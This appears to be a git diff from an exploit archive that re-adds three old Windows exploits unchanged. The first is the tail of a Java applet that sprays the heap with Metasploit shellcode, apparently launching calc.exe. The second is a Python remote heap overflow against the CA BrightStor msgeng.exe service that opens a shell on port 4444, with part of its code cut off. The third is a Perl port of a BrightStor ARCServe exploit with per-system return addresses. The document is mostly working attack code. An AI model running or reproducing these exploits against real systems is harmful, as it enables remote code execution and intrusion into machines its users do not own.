(byte)0x59, (byte)0x85, (byte)0x19, (byte)0x18, (byte)0xa1, (byte)0x05, (byte)0x3b, (byte)0x30, (byte)0xe6, (byte)0x4d, (byte)0xea, + (byte)0x50, (byte)0xb4, (byte)0x11, (byte)0x40, (byte)0x06, (byte)0x00, (byte)0x16, (byte)0x01, (byte)0x02, (byte)0x05, (byte)0x46, (byte)0x3a, (byte)0x52, (byte)0xa3, (byte)0x1e, (byte)0xc0, + (byte)0x83, (byte)0x4a, (byte)0x8d, (byte)0x5e, (byte)0x03, (byte)0xfe, (byte)0xa7, (byte)0x54, (byte)0x94, (byte)0xa2, (byte)0xd4, (byte)0x05, (byte)0x6f, (byte)0x28, (byte)0x03, (byte)0x54, + (byte)0x31, (byte)0x10, (byte)0x55, (byte)0x2b, (byte)0x98, (byte)0x11, (byte)0x90, (byte)0xbe, (byte)0x7c, (byte)0x69, (byte)0x18, (byte)0x06, (byte)0x80, (byte)0x05, (byte)0xca, (byte)0x8d, + (byte)0x0c, (byte)0x0b, (byte)0x0b, (byte)0x40, (byte)0x2b, (byte)0x00, (byte)0x88, (byte)0xea, (byte)0x86, (byte)0xc6, (byte)0x4a, (byte)0xc1, (byte)0x0d, (byte)0x86, (byte)0xda, (byte)0x40, + (byte)0x01, (byte)0xf1, (byte)0x36, (byte)0x27, (byte)0x02, (byte)0x4e, (byte)0xd6, (byte)0x82, (byte)0x98, (byte)0x7d, (byte)0xc0, (byte)0x0d, (byte)0x33, (byte)0x80, (byte)0x80, (byte)0xf7, + (byte)0xd9, (byte)0xf5, (byte)0x0d, (byte)0x55, (byte)0xe8, (byte)0x40, (byte)0x1b, (byte)0x94, (byte)0xa0, (byte)0x84, (byte)0x24, (byte)0xd8, (byte)0x60, (byte)0x91, (byte)0x33, (byte)0xf3, + (byte)0x83, (byte)0x12, (byte)0x14, (byte)0x0b, (byte)0x85, (byte)0x23, (byte)0x84, (byte)0x88, (byte)0x0e, (byte)0xc7, (byte)0xb2, (byte)0x59, (byte)0x1c, (byte)0x64, (byte)0xf0, (byte)0x85, + (byte)0x0d, (byte)0x6c, (byte)0x40, (byte)0x0a, (byte)0x06, (byte)0xc8, (byte)0x15, (byte)0xb3, (byte)0x76, (byte)0xdb, (byte)0xb2, (byte)0x0a, (byte)0x36, (byte)0x80, (byte)0x03, (byte)0xf4, + (byte)0x4b, (byte)0x41, (byte)0x1c, (byte)0x94, (byte)0x00, (byte)0x82, (byte)0x22, (byte)0x18, (byte)0x97, (byte)0x04, (byte)0x02, (byte)0xc0, (byte)0x03, (byte)0x6a, (byte)0x47, (byte)0xf6, + (byte)0x83, (byte)0x3b, (byte)0x28, (byte)0x40, (byte)0x01, (byte)0x2c, (byte)0x58, (byte)0xc3, (byte)0x97, (byte)0x0a, 
(byte)0x50, (byte)0x80, (byte)0x39, (byte)0x60, (byte)0xe1, (byte)0xba, + (byte)0x58, (byte)0x38, (byte)0x81, (byte)0x0e, (byte)0x78, (byte)0xc0, (byte)0x87, (byte)0x0d, (byte)0x18, (byte)0x60, (byte)0x44, (byte)0x24, (byte)0x8a, (byte)0x50, (byte)0x1e, (byte)0xce, + (byte)0x60, (byte)0x26, (byte)0x33, (byte)0x79, (byte)0x8b, (byte)0x0f, (byte)0x66, (byte)0x20, (byte)0x6e, (byte)0x31, (byte)0x5b, (byte)0xb8, (byte)0x84, (byte)0x25, (byte)0xf8, (byte)0xf3, + (byte)0x6a, (byte)0x36, (byte)0x10, (byte)0x80, (byte)0x00, (byte)0x8a, (byte)0xd0, (byte)0x05, (byte)0xec, (byte)0xb6, (byte)0x70, (byte)0x10, (byte)0x73, (byte)0xd0, (byte)0xc1, (byte)0x11, + (byte)0x22, (byte)0x60, (byte)0x54, (byte)0x03, (byte)0x6c, (byte)0xc0, (byte)0x4c, (byte)0x06, (byte)0x08, (byte)0xb0, (byte)0x6d, (byte)0x6d, (byte)0x7b, (byte)0x83, (byte)0x63, (byte)0x11, + (byte)0xf7, (byte)0x04, (byte)0x58, (byte)0x68, (byte)0xef, (byte)0x46, (byte)0x90, (byte)0x49, (byte)0x31, (byte)0xb3, (byte)0x2a, (byte)0x58, (byte)0x11, (byte)0x25, (byte)0x28, (byte)0x82, + (byte)0xff, (byte)0x10, (byte)0x00, (byte)0x00, (byte)0x04, (byte)0xa2, (byte)0x52, (byte)0xa0, (byte)0xb1, (byte)0x01, (byte)0xce, (byte)0xb0, (byte)0x01, (byte)0xa4, (byte)0x40, (byte)0x96, + (byte)0x39, (byte)0xfc, (byte)0x40, (byte)0x4b, (byte)0xb2, (byte)0x58, (byte)0x6e, (byte)0x0a, (byte)0x0d, (byte)0xe1, (byte)0x1d, (byte)0x3c, (byte)0x24, (byte)0x36, (byte)0x26, (byte)0x28, + (byte)0x96, (byte)0x49, (byte)0x8d, (byte)0x56, (byte)0x0c, (byte)0x04, (byte)0x00, (byte)0x30, (byte)0x67, (byte)0xc4, (byte)0x95, (byte)0xc0, (byte)0x82, (byte)0x10, (byte)0x62, (byte)0xe2, + (byte)0x81, (byte)0x1a, (byte)0xdb, (byte)0x78, (byte)0xc5, (byte)0x35, (byte)0xf2, (byte)0x00, (byte)0x0b, (byte)0x68, (byte)0x07, (byte)0xe3, (byte)0x48, (byte)0x78, (byte)0xe7, (byte)0x04, + (byte)0x43, (byte)0x88, (byte)0x49, (byte)0x54, (byte)0x70, (byte)0xbc, (byte)0x62, (byte)0xa2, (byte)0x02, (byte)0x01, (byte)0x0e, (byte)0xd2, (byte)0xea, (byte)0xb1, (byte)0x23, 
(byte)0x04, + (byte)0x74, (byte)0x95, (byte)0x22, (byte)0x90, (byte)0x41, (byte)0xc5, (byte)0x72, (byte)0x91, (byte)0x4b, (byte)0x8d, (byte)0x73, (byte)0x0c, (byte)0x06, (byte)0x0f, (byte)0x30, (byte)0x01, + (byte)0x0f, (byte)0x48, (byte)0x50, (byte)0xf2, (byte)0x92, (byte)0x65, (byte)0xf1, (byte)0x83, (byte)0x22, (byte)0xb0, (byte)0x60, (byte)0xca, (byte)0x14, (byte)0x00, (byte)0x43, (byte)0x98, + (byte)0xab, (byte)0x3c, (byte)0x65, (byte)0x36, (byte)0x40, (byte)0x81, (byte)0x09, (byte)0x4b, (byte)0xc8, (byte)0xb2, (byte)0x96, (byte)0x19, (byte)0x31, (byte)0x8d, (byte)0x0f, (byte)0xfc, + (byte)0x00, (byte)0x04, (byte)0x32, (byte)0x81, (byte)0x42, (byte)0x8d, (byte)0xa2, (byte)0x1c, (byte)0x01, (byte)0xa8, (byte)0x78, (byte)0x00, (byte)0x0c, (byte)0x66, (byte)0xa6, (byte)0x42, + (byte)0x92, (byte)0xd6, (byte)0xfc, (byte)0x11, (byte)0x2e, (byte)0x53, (byte)0x21, (byte)0xce, (byte)0x35, (byte)0x6a, (byte)0xac, (byte)0x1b, (byte)0xea, (byte)0x5c, (byte)0xe5, (byte)0xc6, + (byte)0x52, (byte)0x40, (byte)0xcf, (byte)0x7c, (byte)0x7e, (byte)0x04, (byte)0x1e, (byte)0xfe, (byte)0x1c, (byte)0x15, (byte)0xb9, (byte)0xac, (byte)0x07, (byte)0x0c, (byte)0x8f, (byte)0x8e, + (byte)0x0a, (byte)0x1b, (byte)0xdc, (byte)0x30, (byte)0x01, (byte)0xf7, (byte)0x22, (byte)0x2f, (byte)0xd1, (byte)0x88, (byte)0xc0, (byte)0x83, (byte)0x12, (byte)0xe2, (byte)0xec, (byte)0xe8, + (byte)0x3a, (byte)0xaf, (byte)0xa7, (byte)0xb1, (byte)0x30, (byte)0x98, (byte)0xb4, (byte)0x12, (byte)0xce, (byte)0x86, (byte)0xe9, (byte)0x45, (byte)0xfc, (byte)0xe0, (byte)0xcf, (byte)0x2b, + (byte)0x86, (byte)0x74, (byte)0x04, (byte)0x06, (byte)0xfd, (byte)0x68, (byte)0x3c, (byte)0xb3, (byte)0x41, (byte)0x09, (byte)0x86, (byte)0x2d, (byte)0x75, (byte)0x21, (byte)0x4e, (byte)0x0d, + (byte)0x85, (byte)0x28, (byte)0xab, (byte)0x7a, (byte)0x3d, (byte)0x5f, (byte)0x68, (byte)0xac, (byte)0xab, (byte)0x17, (byte)0x10, (byte)0x6b, (byte)0x59, (byte)0x0f, (byte)0x82, (byte)0xd6, + (byte)0xb6, (byte)0xee, (byte)0x4f, 
(byte)0x04, (byte)0x66, (byte)0xe4, (byte)0x06, (byte)0x36, (byte)0x7c, (byte)0xa1, (byte)0x02, (byte)0x47, (byte)0xf1, (byte)0x75, (byte)0x22, (byte)0xde, + (byte)0xff, (byte)0x5c, (byte)0xeb, (byte)0x4e, (byte)0x0f, (byte)0x1b, (byte)0xd7, (byte)0x46, (byte)0x65, (byte)0x03, (byte)0xb8, (byte)0x4e, (byte)0x42, (byte)0x56, (byte)0x65, (byte)0x1f, + (byte)0x62, (byte)0x0f, (byte)0x7d, (byte)0x48, (byte)0x87, (byte)0xaa, (byte)0xc1, (byte)0x3b, (byte)0xec, (byte)0x2f, (byte)0x48, (byte)0xa1, (byte)0xdb, (byte)0x7a, (byte)0xae, (byte)0xb6, + (byte)0xb5, (byte)0x0b, (byte)0x61, (byte)0x81, (byte)0x6c, (byte)0x9b, (byte)0x66, (byte)0x34, (byte)0xe0, (byte)0x05, (byte)0xaf, (byte)0xa1, (byte)0x46, (byte)0xd4, (byte)0x2a, (byte)0x71, + (byte)0x8f, (byte)0x7b, (byte)0x10, (byte)0x36, (byte)0x50, (byte)0x82, (byte)0x08, (byte)0xfa, (byte)0x93, (byte)0x6e, (byte)0x3e, (byte)0x40, (byte)0xe8, (byte)0xb6, (byte)0xb9, (byte)0x15, + (byte)0xc2, (byte)0x09, (byte)0x54, (byte)0xa9, (byte)0x64, (byte)0x82, (byte)0xbc, (byte)0x62, (byte)0x02, (byte)0x22, (byte)0x18, (byte)0xcd, (byte)0x11, (byte)0xc0, (byte)0x8b, (byte)0xaa, + (byte)0x08, (byte)0x11, (byte)0xd8, (byte)0x0c, (byte)0x54, (byte)0xe0, (byte)0x77, (byte)0x8f, (byte)0xfd, (byte)0x3d, (byte)0x82, (byte)0x8b, (byte)0x59, (byte)0xe7, (byte)0xe1, (byte)0x66, + (byte)0xe0, (byte)0x43, (byte)0xae, (byte)0x36, (byte)0x70, (byte)0xaa, (byte)0x2c, (byte)0xbd, (byte)0xbb, (byte)0x10, (byte)0xb0, (byte)0x59, (byte)0x83, (byte)0x0c, (byte)0xb6, (byte)0x06, + (byte)0xa1, (byte)0x5c, (byte)0x25, (byte)0xac, (byte)0xbc, (byte)0x11, (byte)0xf0, (byte)0xd4, (byte)0xc5, (byte)0xc9, (byte)0x0d, (byte)0x97, (byte)0x6c, (byte)0xe5, (byte)0x8a, (byte)0x5d, + (byte)0x53, (byte)0xba, (byte)0x01, (byte)0x1b, (byte)0x98, (byte)0xd0, (byte)0x6b, (byte)0x5f, (byte)0x7f, (byte)0xa0, (byte)0x0b, (byte)0xb3, (byte)0xd5, (byte)0xd6, (byte)0xa9, (byte)0x08, + (byte)0xc0, (byte)0xae, (byte)0x3c, (byte)0x90, (byte)0x88, (byte)0xe5, (byte)0x23, (byte)0xc7, 
(byte)0x0a, (byte)0x33, (byte)0xa7, (byte)0xd0, (byte)0x86, (byte)0xd0, (byte)0x6c, (byte)0x0d, + (byte)0x61, (byte)0x11, (byte)0x7a, (byte)0xd6, (byte)0x88, (byte)0x2a, (byte)0xd0, (byte)0xf2, (byte)0x44, (byte)0xeb, (byte)0x1c, (byte)0x02, (byte)0x32, (byte)0xe0, (byte)0xc1, (byte)0x79, + (byte)0xa8, (byte)0xb3, (byte)0x35, (byte)0x6f, (byte)0x11, (byte)0x8a, (byte)0x00, (byte)0x47, (byte)0x70, (byte)0xcf, (byte)0xc8, (byte)0x09, (byte)0xf1, (byte)0xb6, (byte)0x1e, (byte)0xb4, + (byte)0xc1, (byte)0x0e, (byte)0x3e, (byte)0xa7, (byte)0x03, (byte)0x07, (byte)0xe8, (byte)0x30, (byte)0xb7, (byte)0x34, (byte)0x44, (byte)0xe8, (byte)0x08, (byte)0x16, (byte)0x9f, (byte)0xfa, + (byte)0x2f, (byte)0x96, (byte)0x50, (byte)0x00, (byte)0x19, (byte)0x98, (byte)0xac, (byte)0x56, (byte)0x0f, (byte)0x13, (byte)0xef, (byte)0x18, (byte)0xfc, (byte)0x0b, (byte)0xf6, (byte)0x3d, + (byte)0x5f, (byte)0xfc, (byte)0x07, (byte)0xc6, (byte)0x9a, (byte)0x02, (byte)0x90, (byte)0x82, (byte)0xb4, (byte)0x30, (byte)0x9b, (byte)0xf3, (byte)0x41, (byte)0x46, (byte)0xe0, (byte)0x42, + (byte)0xd1, (byte)0xd4, (byte)0x09, (byte)0x61, (byte)0x01, (byte)0x5a, (byte)0xd1, (byte)0x01, (byte)0x4e, (byte)0x17, (byte)0x58, (byte)0xd9, (byte)0x17, (byte)0xf8, (byte)0xd0, (byte)0x31, + (byte)0xff, (byte)0x21, (byte)0x24, (byte)0x7b, (byte)0xef, (byte)0x48, (byte)0x7c, (byte)0x13, (byte)0xd6, (byte)0x7d, (byte)0x80, (byte)0x03, (byte)0x0e, (byte)0xa4, (byte)0x81, (byte)0x0e, + (byte)0x66, (byte)0x42, (byte)0x41, (byte)0x1a, (byte)0xbe, (byte)0x20, (byte)0x04, (byte)0x44, (byte)0x22, (byte)0x5e, (byte)0x10, (byte)0x7b, (byte)0x50, (byte)0xc2, (byte)0x14, (byte)0x9c, + (byte)0x84, (byte)0x83, (byte)0x20, (byte)0x31, (byte)0xc8, (byte)0x4c, (byte)0x63, (byte)0xa0, (byte)0x03, (byte)0x18, (byte)0x16, (byte)0xc0, (byte)0x8e, (byte)0xcb, (byte)0x07, (byte)0xa0, + (byte)0x08, (byte)0x4a, (byte)0x60, (byte)0x3c, (byte)0xd6, (byte)0x3b, (byte)0x0f, (byte)0x22, (byte)0x67, (byte)0x41, (byte)0x8c, (byte)0xf4, (byte)0x6a, 
(byte)0x1e, (byte)0xf9, (byte)0x80, + (byte)0xe6, (byte)0x30, (byte)0x83, (byte)0x19, (byte)0xf4, (byte)0x1c, (byte)0x07, (byte)0x38, (byte)0xe0, (byte)0x50, (byte)0x83, (byte)0x34, (byte)0x35, (byte)0x37, (byte)0x21, (byte)0xe0, + (byte)0xe5, (byte)0xf2, (byte)0x0c, (byte)0x48, (byte)0x42, (byte)0xe7, (byte)0xa5, (byte)0x83, (byte)0xf5, (byte)0x20, (byte)0xed, (byte)0xea, (byte)0x08, (byte)0x37, (byte)0x18, (byte)0x83, + (byte)0x19, (byte)0x44, (byte)0x7e, (byte)0x79, (byte)0x3d, (byte)0xec, (byte)0x01, (byte)0x07, (byte)0xb5, (byte)0xbf, (byte)0x3d, (byte)0x07, (byte)0xb6, (byte)0xf6, (byte)0xf7, (byte)0x34, + (byte)0x18, (byte)0x60, (byte)0x0d, (byte)0xf3, (byte)0xda, (byte)0x3b, (byte)0x03, (byte)0x42, (byte)0xb0, (byte)0x82, (byte)0x0e, (byte)0xd8, (byte)0xa1, (byte)0x0d, (byte)0xb9, (byte)0x0f, + (byte)0xcd, (byte)0xc6, (byte)0x7c, (byte)0xb0, (byte)0x32, (byte)0x21, (byte)0xc0, (byte)0xcc, (byte)0xf4, (byte)0xc1, (byte)0xef, (byte)0x40, (byte)0x82, (byte)0x72, (byte)0x3f, (byte)0x85, + (byte)0xba, (byte)0x59, (byte)0x67, (byte)0x41, (byte)0x17, (byte)0x50, (byte)0xc2, (byte)0x8b, (byte)0x4d, (byte)0xff, (byte)0xfc, (byte)0x15, (byte)0xd8, (byte)0x1e, (byte)0x02, (byte)0x6d, + (byte)0x60, (byte)0xd0, (byte)0xfb, (byte)0x89, (byte)0xc3, (byte)0x04, (byte)0x2c, (byte)0x28, (byte)0x1c, (byte)0xd3, (byte)0x7b, (byte)0x30, (byte)0x03, (byte)0xf6, (byte)0x87, (byte)0x7f, + (byte)0xa1, (byte)0x41, (byte)0x1b, (byte)0x0f, (byte)0x27, (byte)0x04, (byte)0xd9, (byte)0x87, (byte)0x78, (byte)0xb4, (byte)0x67, (byte)0x7b, (byte)0x6d, (byte)0xd0, (byte)0x06, (byte)0x3d, + (byte)0x30, (byte)0x05, (byte)0x3f, (byte)0x57, (byte)0x1b, (byte)0x0b, (byte)0x60, (byte)0x36, (byte)0x1c, (byte)0xb5, (byte)0x77, (byte)0x27, (byte)0xc0, (byte)0x21, (byte)0x76, (byte)0xa0, + (byte)0x20, (byte)0xe8, (byte)0x91, (byte)0x2d, (byte)0x32, (byte)0xc0, (byte)0x05, (byte)0x36, (byte)0xa0, (byte)0x18, (byte)0xa6, (byte)0x87, (byte)0x7a, (byte)0x6d, (byte)0x30, (byte)0x03, + (byte)0x53, 
(byte)0xc0, (byte)0x03, (byte)0x53, (byte)0xf0, (byte)0x70, (byte)0x37, (byte)0x73, (byte)0x04, (byte)0x05, (byte)0xe0, (byte)0x2a, (byte)0xff, (byte)0xa7, (byte)0x65, (byte)0xed, + (byte)0xd0, (byte)0x05, (byte)0x4a, (byte)0xd0, (byte)0x73, (byte)0xc8, (byte)0x02, (byte)0x17, (byte)0xb6, (byte)0x21, (byte)0x03, (byte)0x42, (byte)0xd0, (byte)0x03, (byte)0x18, (byte)0x94, + (byte)0xff, (byte)0x17, (byte)0x97, (byte)0xf7, (byte)0x01, (byte)0x36, (byte)0x30, (byte)0x01, (byte)0x25, (byte)0x13, (byte)0x4b, (byte)0x35, (byte)0x78, (byte)0x1c, (byte)0x6d, (byte)0x50, + (byte)0x45, (byte)0xa6, (byte)0x37, (byte)0x08, (byte)0x51, (byte)0xc0, (byte)0x04, (byte)0x42, (byte)0x00, (byte)0x01, (byte)0xcd, (byte)0x14, (byte)0x84, (byte)0x1a, (byte)0x57, (byte)0x00, + (byte)0x96, (byte)0xd7, (byte)0x82, (byte)0x7c, (byte)0x56, (byte)0x02, (byte)0x24, (byte)0x20, (byte)0x04, (byte)0x53, (byte)0x30, (byte)0x5b, (byte)0xb7, (byte)0x11, (byte)0x18, (byte)0x3c, + (byte)0x90, (byte)0x04, (byte)0xb2, (byte)0xb0, (byte)0x45, (byte)0xda, (byte)0x07, (byte)0x1f, (byte)0x3e, (byte)0x12, (byte)0x07, (byte)0x1a, (byte)0x77, (byte)0x85, (byte)0x6b, (byte)0xa0, + (byte)0x03, (byte)0xa7, (byte)0xd5, (byte)0x0a, (byte)0x0c, (byte)0xa6, (byte)0x6c, (byte)0x73, (byte)0x24, (byte)0x61, (byte)0x7d, (byte)0x70, (byte)0x2c, (byte)0x7d, (byte)0x80, (byte)0x1c, + (byte)0x6b, (byte)0x60, (byte)0x01, (byte)0x03, (byte)0x02, (byte)0x1f, (byte)0x7b, (byte)0x87, (byte)0x16, (byte)0x20, (byte)0x30, (byte)0x04, (byte)0x37, (byte)0xd8, (byte)0x07, (byte)0x6d, + (byte)0xf8, (byte)0x12, (byte)0x3c, (byte)0x40, (byte)0x3a, (byte)0xd2, (byte)0x50, (byte)0x35, (byte)0xa6, (byte)0x57, (byte)0x0e, (byte)0x15, (byte)0x00, (byte)0x86, (byte)0x43, (byte)0xf0, + (byte)0x12, (byte)0x2f, (byte)0x41, (byte)0x86, (byte)0xf0, (byte)0x11, (byte)0x87, (byte)0xa6, (byte)0x57, (byte)0x02, (byte)0x3a, (byte)0x90, (byte)0x0e, (byte)0x6b, (byte)0xe0, (byte)0x14, + (byte)0x45, (byte)0xb1, (byte)0x07, (byte)0x96, (byte)0x17, (byte)0x00, 
(byte)0xcb, (byte)0x50, (byte)0x84, (byte)0x01, (byte)0xe0, (byte)0x13, (byte)0x21, (byte)0x25, (byte)0x02, (byte)0x64, + (byte)0x60, (byte)0x19, (byte)0x3a, (byte)0xd0, (byte)0x05, (byte)0xde, (byte)0xf1, (byte)0x53, (byte)0x97, (byte)0xb7, (byte)0x04, (byte)0x77, (byte)0x10, (byte)0x52, (byte)0x83, (byte)0x08, + (byte)0x05, (byte)0x42, (byte)0x00, (byte)0x89, (byte)0xbc, (byte)0xc1, (byte)0x1a, (byte)0x50, (byte)0x88, (byte)0x69, (byte)0x12, (byte)0xc6, (byte)0x02, (byte)0x6d, (byte)0x08, (byte)0x05, + (byte)0x4a, (byte)0xe0, (byte)0x0b, (byte)0x59, (byte)0xa1, (byte)0x13, (byte)0x94, (byte)0x18, (byte)0x00, (byte)0x36, (byte)0xe0, (byte)0x16, (byte)0x6b, (byte)0x40, (byte)0x06, (byte)0xe6, + (byte)0xf7, (byte)0x7b, (byte)0xb3, (byte)0x58, (byte)0x08, (byte)0xbc, (byte)0xa0, (byte)0x04, (byte)0x64, (byte)0xd0, (byte)0x07, (byte)0x4a, (byte)0xc0, (byte)0x63, (byte)0xbb, (byte)0x58, + (byte)0x08, (byte)0x0c, (byte)0x30, (byte)0x07, (byte)0x15, (byte)0xa0, (byte)0x0d, (byte)0x7b, (byte)0xb0, (byte)0x04, (byte)0xcc, (byte)0x80, (byte)0x88, (byte)0xc3, (byte)0x18, (byte)0x05, + (byte)0x24, (byte)0x70, (byte)0x07, (byte)0x2a, (byte)0x80, (byte)0x05, (byte)0xc3, (byte)0x88, (byte)0x08, (byte)0x8d, (byte)0x24, (byte)0x00, (byte)0x36, (byte)0x50, (byte)0x02, (byte)0xa9, + (byte)0x78, (byte)0x71, (byte)0xf7, (byte)0x35, (byte)0x8d, (byte)0xdc, (byte)0x68, (byte)0x39, (byte)0x18, (byte)0x57, (byte)0x74, (byte)0x88, (byte)0xc7, (byte)0x8c, (byte)0xcc, (byte)0xd8, + (byte)0x09, (byte)0x8d, (byte)0x3f, (byte)0x74, (byte)0x86, (byte)0xe4, (byte)0x28, (byte)0x1f, (byte)0x81, (byte)0x00, (byte)0x00, (byte)0x3b + }; + byte[] shellcode = new byte[] + { + (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, + // shellcode copied from metasploit to run calc.exe + (byte)0x29, (byte)0xc9, (byte)0x83, (byte)0xe9, (byte)0xde, (byte)0xd9, (byte)0xee, 
(byte)0xd9, (byte)0x74, (byte)0x24, (byte)0xf4, (byte)0x5b, (byte)0x81, (byte)0x73, (byte)0x13, (byte)0x38, + (byte)0x09, (byte)0x13, (byte)0x8e, (byte)0x83, (byte)0xeb, (byte)0xfc, (byte)0xe2, (byte)0xf4, (byte)0xc4, (byte)0xe1, (byte)0x57, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xcb, + (byte)0x04, (byte)0x82, (byte)0x6f, (byte)0x8b, (byte)0x40, (byte)0x08, (byte)0xfc, (byte)0x05, (byte)0x77, (byte)0x11, (byte)0x98, (byte)0xd1, (byte)0x18, (byte)0x08, (byte)0xf8, (byte)0xc7, + (byte)0xb3, (byte)0x3d, (byte)0x98, (byte)0x8f, (byte)0xd6, (byte)0x38, (byte)0xd3, (byte)0x17, (byte)0x94, (byte)0x8d, (byte)0xd3, (byte)0xfa, (byte)0x3f, (byte)0xc8, (byte)0xd9, (byte)0x83, + (byte)0x39, (byte)0xcb, (byte)0xf8, (byte)0x7a, (byte)0x03, (byte)0x5d, (byte)0x37, (byte)0x8a, (byte)0x4d, (byte)0xec, (byte)0x98, (byte)0xd1, (byte)0x1c, (byte)0x08, (byte)0xf8, (byte)0xe8, + (byte)0xb3, (byte)0x05, (byte)0x58, (byte)0x05, (byte)0x67, (byte)0x15, (byte)0x12, (byte)0x65, (byte)0xb3, (byte)0x15, (byte)0x98, (byte)0x8f, (byte)0xd3, (byte)0x80, (byte)0x4f, (byte)0xaa, + (byte)0x3c, (byte)0xca, (byte)0x22, (byte)0x4e, (byte)0x5c, (byte)0x82, (byte)0x53, (byte)0xbe, (byte)0xbd, (byte)0xc9, (byte)0x6b, (byte)0x82, (byte)0xb3, (byte)0x49, (byte)0x1f, (byte)0x05, + (byte)0x48, (byte)0x15, (byte)0xbe, (byte)0x05, (byte)0x50, (byte)0x01, (byte)0xf8, (byte)0x87, (byte)0xb3, (byte)0x89, (byte)0xa3, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xe6, + (byte)0x04, (byte)0x56, (byte)0x22, (byte)0x78, (byte)0x58, (byte)0x5f, (byte)0x9a, (byte)0x76, (byte)0xbb, (byte)0xc9, (byte)0x68, (byte)0xde, (byte)0x50, (byte)0xf9, (byte)0x99, (byte)0x8a, + (byte)0x67, (byte)0x61, (byte)0x8b, (byte)0x70, (byte)0xb2, (byte)0x07, (byte)0x44, (byte)0x71, (byte)0xdf, (byte)0x6a, (byte)0x72, (byte)0xe2, (byte)0x5b, (byte)0x09, (byte)0x13, (byte)0x8e + }; + + public void init() { + image = Toolkit.getDefaultToolkit().createImage(imageBytes); + } + + public void paint(Graphics g) { + int 
heapBlockSize = 0x5000000;
+ int heapSlidSize = 0x100000;
+ byte[] buffer = new byte[heapBlockSize];
+ byte heapFilling = (byte)0x24;
+
+ for (int i = 0; i < buffer.length; i ++) {
+ buffer[i] = heapFilling;
+ }
+
+ for (int i = 1; i < 0x50; i ++) {
+ for (int j = 0; j < shellcode.length; j ++) {
+ buffer[i * heapSlidSize - shellcode.length - 0x1000 + j] = shellcode[j];
+ }
+ }
+
+ if (image != null) {
+ g.drawImage(image, 0, 0, this);
+ }
+ }
+}
+
+// milw0rm.com [2007-01-21]
diff --git a/platforms/windows/remote/3211.py b/platforms/windows/remote/3211.py
index e1dba7205..5d04c4e75 100755
--- a/platforms/windows/remote/3211.py
+++ b/platforms/windows/remote/3211.py
@@ -1,69 +1,69 @@
-#!/usr/bin/python
-# I couldnt find a reliable exploit for my analysis and so came up with this.
-# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
-# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
-# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
-# to port to other platforms. The exploit overwrites the
-# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
-# address of call dword ptr [esi +4C] located in user32.dll. At the time when
-# UEF is called esi +4C contains a pointer to our shellcode.
-#
-# Winny M Thomas ;-)
-# Author shall bear no responsibility for any screw ups caused by using this code
-
-from impacket.dcerpc import transport, dcerpc
-from impacket import uuid
-import struct
-import sys
-
-def DCEconnectAndExploit(target):
- trans = transport.TCPTransport(target, 6503)
- trans.connect()
- dce = dcerpc.DCERPC_v5(trans)
- dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
-
- request = "A" * 676
- request += "\x90\x90\x90\x90"
- request += "\x90\x90\xeb\x0a"
-
- #Call dword ptr [esi +4C] from user32.dll
- request += struct.pack("\n' % sys.argv[0]
- sys.exit(-1)
-
- DCEconnectAndExploit(target)
-
-# milw0rm.com [2007-01-27]
+#!/usr/bin/python
+# I couldnt find a reliable exploit for my analysis and so came up with this.
+# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
+# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
+# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
+# to port to other platforms. The exploit overwrites the
+# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
+# address of call dword ptr [esi +4C] located in user32.dll. At the time when
+# UEF is called esi +4C contains a pointer to our shellcode.
+#
+# Winny M Thomas ;-)
+# Author shall bear no responsibility for any screw ups caused by using this code
+
+from impacket.dcerpc import transport, dcerpc
+from impacket import uuid
+import struct
+import sys
+
+def DCEconnectAndExploit(target):
+ trans = transport.TCPTransport(target, 6503)
+ trans.connect()
+ dce = dcerpc.DCERPC_v5(trans)
+ dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
+
+ request = "A" * 676
+ request += "\x90\x90\x90\x90"
+ request += "\x90\x90\xeb\x0a"
+
+ #Call dword ptr [esi +4C] from user32.dll
+ request += struct.pack("\n' % sys.argv[0]
+ sys.exit(-1)
+
+ DCEconnectAndExploit(target)
+
+# milw0rm.com [2007-01-27]
diff --git a/platforms/windows/remote/3218.pl b/platforms/windows/remote/3218.pl
index ad50db9d2..c0b6b5a57 100755
--- a/platforms/windows/remote/3218.pl
+++ b/platforms/windows/remote/3218.pl
@@ -1,144 +1,144 @@ -#!/usr/bin/perl -# -# original exploit by lssec.com this is a perl porting -# -# acaro [at] jervus.it - - -use IO::Socket::INET; -use Switch; - -if (@ARGV < 3) { -print "--------------------------------------------------------------------\n"; -print "Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress\n"; -print " Return address: \n"; -print " 1 - Windows 2k Sp4 English Version\n"; -print " 2 - Windows 2k Sp4 Italian Version\n"; -print " 3 - Windows XP Pro Sp1 English Version\n"; -print " 4 - Windows XP Pro Sp0 English Version\n"; -print " If values not specified, Windows 2k Sp4 will be used.\n"; -print " Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1 -o1\n"; -print "--------------------------------------------------------------------\n"; -} - -use IO::Socket::INET; - -my $host = 10.0.0.2; -my $port = 6503; -my $reply; -my $request; -my $jmp="\xeb\x0a\x90\x90"; # JMP over ret and uef to our shellcode - - - - -foreach (@ARGV) { -$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); -$uef = $1 if ($_=~/-o(.*)/); -$ret = $1 if ($_=~/-o(.*)/); -} - - - - -switch ($uef) { -case 1 { $uef="\x4c\x14\x54\x7c" } # Win2k SP4 English version -case 2 { $uef="\x4c\x14\x68\x79" } # Win2k SP4 Italian version -case 3 { $uef="\xb4\x73\xed\x77" } # WinXP Pro English SP1 version 